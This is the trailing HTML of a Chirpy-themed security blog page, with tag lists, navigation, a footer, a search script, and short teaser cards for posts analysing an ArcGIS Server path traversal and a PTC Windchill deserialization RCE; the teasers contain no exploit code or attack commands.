    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/blog_cve_2026_9181_arcgis_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783917240"
  data-df="ll"
  
>
  Jul 13, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-9181 Path Traversal in Esri ArcGIS Server</h4>
              <div class="text-muted">
                <p>Reverse-engineering the vulnerability from the official patch, locating where the filename is concatenated verbatim into the write path, and reproducing the full chain — from triggering to disablin...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_cve_2026_9181_arcgis_cn/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783917240"
  data-df="ll"
  
>
  Jul 13, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-9181：Esri ArcGIS Server 路径遍历漏洞分析</h4>
              <div class="text-muted">
                <p>背景

CVE-2026-9181 是 Esri ArcGIS Server 的一个路径遍历漏洞（CWE-22）。CVSS v3.1 评分 9.8，网络可达、无需认证、无需用户交互。官方公告描述的危害是攻击者可”覆盖敏感文件”并获得”完全的管理访问权限”。

ArcGIS Server 是 Esri 的 GIS（地理信息系统）服务端产品，负责发布地图服务、地理处理服务（GP 服务）等，广泛部...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_cve_2026_12569_cn/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783485240"
  data-df="ll"
  
>
  Jul  8, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-12569 深度分析：PTC Windchill 未授权反序列化 RCE</h4>
              <div class="text-muted">
                <p>背景

先介绍这个产品。PTC Windchill 是一套产品生命周期管理（PLM）系统，用在制造业和重工业领域，管理从设计、工程到生产的完整数据链条——CAD 图纸、物料清单（BOM）、变更记录、零部件文档都归它管。它服务的企业大多是航空航天、汽车、重型机械、国防承包商这类，设计图纸和工程数据属于核心机密，所以这套系统一旦被打穿，泄露的就是企业的研发命脉。Windchill 体型庞大，前端...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/blog_cve_2026_12569_cn/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>CVE-2026-12569 深度分析：PTC Windchill 未授权反序列化 RCE</p>
    </a>
  

  
    <a
      href="/posts/blog_cve_2026_9181_arcgis_cn/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>CVE-2026-9181：Esri ArcGIS Server 路径遍历漏洞分析</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://twitter.com/Mortyjin">Mortyjin</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

